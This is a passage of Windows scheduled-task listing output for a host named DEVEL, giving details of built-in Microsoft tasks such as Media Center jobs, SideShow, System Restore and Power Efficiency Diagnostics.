Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\ehDRMInit
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /DRMInit
Start In: N/A
Comment: Privileged Media Center DRM initialization job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\InstallPlayReady
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0)
Start In: N/A
Comment: Privileged Media Center PlayReady install job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\mcupdate
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\mcupdate $(Arg0)
Start In: N/A
Comment: Check for Media Center updates.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: NETWORK SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\MediaCenterRecoveryTask
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: Multiple actions
Start In: Multiple actions
Comment: Perform Media Center Recovery activities
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: Multiple actions
Start In: Multiple actions
Comment: Perform Object Store Recovery activities
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: NETWORK SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\OCURActivate
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /OCURActivate
Start In: N/A
Comment: Privileged Media Center OCUR activation job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\OCURDiscovery
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0)
Start In: N/A
Comment: Privileged Media Center OCUR discovery job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\PBDADiscovery
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /PBDADiscovery
Start In: N/A
Comment: Privileged Media Center OCUR discovery job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\PBDADiscoveryW1
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery
Start In: N/A
Comment: Privileged Media Center OCUR discovery job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\PBDADiscoveryW2
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery
Start In: N/A
Comment: Privileged Media Center OCUR discovery job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\PeriodicScanRetry
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %windir%\ehome\MCUpdate.exe -pscn 0
Start In: N/A
Comment: Background periodic scanner - PeriodicScanRetry
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: NETWORK SERVICE
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only
Start Time: 5:33:00
Start Date: 9/9/2006
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\PvrRecoveryTask
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: Multiple actions
Start In: Multiple actions
Comment: Perform Pvr Recovery activities
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: NETWORK SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\PvrScheduleTask
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: Multiple actions
Start In: Multiple actions
Comment: Perform PVR Scheduling activities
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: NETWORK SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\RecordingRestart
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehrec /RestartRecording
Start In: N/A
Comment: Restarts recordings after a power failure.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: NETWORK SERVICE
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\RegisterSearch
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0)
Start In: N/A
Comment: Privileged Media Center Search registration job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\ReindexSearchRoot
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /DoReindexSearchRoot
Start In: N/A
Comment: Privileged Media Center Search Reindexing job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\SqlLiteRecoveryTask
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: Multiple actions
Start In: Multiple actions
Comment: Perform Data Recovery activities
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: NETWORK SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\UpdateRecordPath
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0)
Start In: N/A
Comment: Privileged Media Center Recorder Permission setting job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\MemoryDiagnostic
HostName: DEVEL
TaskName: \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: Task for launching the Memory Diagnostic
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: Task for launching the Memory Diagnostic
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\MobilePC
HostName: DEVEL
TaskName: \Microsoft\Windows\MobilePC\HotStart
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 28/12/2017 2:44:24
Last Result: 0
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: Launches applications configured for Windows HotStart
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Authenticated Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\MUI
HostName: DEVEL
TaskName: \Microsoft\Windows\MUI\LPRemove
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 13/9/2019 6:16:07
Last Result: 0
Author: Microsoft Corporation
Task To Run: %windir%\system32\lpremove.exe
Start In: N/A
Comment: Launch language cleanup tool
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 10 minutes, If Not Idle Retry For 10 minutes Stop the task if Idle State end
Power Management: No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 09:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Multimedia
HostName: DEVEL
TaskName: \Microsoft\Windows\Multimedia\SystemSoundsService
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 28/12/2017 2:44:24
Last Result: 0
Author: N/A
Task To Run: COM handler
Start In: N/A
Comment: System Sounds User Mode Agent
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\NetTrace
HostName: DEVEL
TaskName: \Microsoft\Windows\NetTrace\GatherNetworkInfo
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft
Task To Run: %windir%\system32\gatherNetworkInfo.vbs
Start In: $(Arg1)
Comment: Network information collector
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Offline Files
HostName: DEVEL
TaskName: \Microsoft\Windows\Offline Files\Background Synchronization
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: This task controls periodic background synchronization of Offline Files when the user is working in an offline mode.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: Authenticated Users
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 24:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Hourly
Start Time: 12:00:00
Start Date: 1/1/2008
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: 6 Hour(s), 0 Minute(s)
Repeat: Until: Time: None
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
HostName: DEVEL
TaskName: \Microsoft\Windows\Offline Files\Logon Synchronization
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: This task initiates synchronization of Offline Files when a user logs onto the system.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Authenticated Users
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 24:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\PLA
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft\Windows\Power Efficiency Diagnostics
HostName: DEVEL
TaskName: \Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem
Next Run Time: 24/9/2019 7:25:41
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 13/9/2019 6:10:36
Last Result: 0
Author: Microsoft Corporation
Task To Run: %SystemRoot%\System32\powercfg.exe -energy -auto
Start In: N/A
Comment: This job analyzes the system looking for conditions that may cause high energy use.
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 5 minutes, If Not Idle Retry For 120 minutes
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 00:05:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 6:00:00
Start Date: 1/1/2008
End Date: N/A
Days: Every 14 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
Folder: \Microsoft\Windows\RAC
HostName: DEVEL
TaskName: \Microsoft\Windows\RAC\RacTask
Next Run Time: 14/9/2019 3:12:49
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 14/9/2019 1:08:36
Last Result: 0
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: Microsoft Reliability Analysis task to process system reliability data.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\RAC\RacTask
Next Run Time: 14/9/2019 3:07:44
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 14/9/2019 1:08:36
Last Result: 0
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: Microsoft Reliability Analysis task to process system reliability data.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Hourly
Start Time: 12:00:00
Start Date: 31/3/2008
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: 1 Hour(s), 0 Minute(s)
Repeat: Until: Time: None
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
Folder: \Microsoft\Windows\Shell
HostName: DEVEL
TaskName: \Microsoft\Windows\Shell\WindowsParentalControls
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft
Task To Run: COM handler
Start In: N/A
Comment: Notifications for actions taken by Windows Parental Controls.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: Authenticated Users
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Shell\WindowsParentalControlsMigration
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: 14/7/2009 7:54:03
Last Result: 0
Author: Microsoft
Task To Run: COM handler
Start In: N/A
Comment: Migration for Windows Parental Controls.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\SideShow
HostName: DEVEL
TaskName: \Microsoft\Windows\SideShow\AutoWake
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: This task automatically wakes the computer and then puts it to sleep when automatic wake is turned on for a Windows SideShow-compatible device.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\SideShow\GadgetManager
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: This task manages and synchronizes metadata for the installed gadgets on a Windows SideShow-compatible device.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\SideShow\SessionAgent
Next Run Time: Disabled
Status: Could not start
Logon Mode: Interactive/Background
Last Run Time: 17/3/2017 4:17:56
Last Result: -2147023729
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: This task manages the session behavior when multiple user accounts exist on a Windows SideShow-compatible device.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\SideShow\SystemDataProviders
Next Run Time: Disabled
Status: Could not start
Logon Mode: Interactive/Background
Last Run Time: 17/3/2017 4:18:11
Last Result: -2147023729
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: This task provides system data for the clock, power source, wireless network strength, and volume on a Windows SideShow-compatible device.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\SystemRestore
HostName: DEVEL
TaskName: \Microsoft\Windows\SystemRestore\SR
Next Run Time: 15/9/2019 12:00:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 14/9/2019 1:08:36
Last Result: 0
Author: Microsoft Corporation
Task To Run: %windir%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation
Start In: N/A
Comment: This task creates regular system protection points.
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 10 minutes, If Not Idle Retry For 1380 minutes
Power Management: No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 12:00:00
Start Date: 14/6/2005
End Date: N/A
Days: Every 1 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
HostName: DEVEL
TaskName: \Microsoft\Windows\SystemRestore\SR
Next Run Time: 15/9/2019 12:00:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 14/9/2019 1:08:36
Last Result: 0
Author: Microsoft Corporation
Task To Run: %windir%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation
Start In: N/A
Comment: This task creates regular system protection points.
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 10 minutes, If Not Idle Retry For 1380 minutes
Power Management: No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Tcpip
HostName: DEVEL
TaskName: \Microsoft\Windows\Tcpip\IpAddressConflict1
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
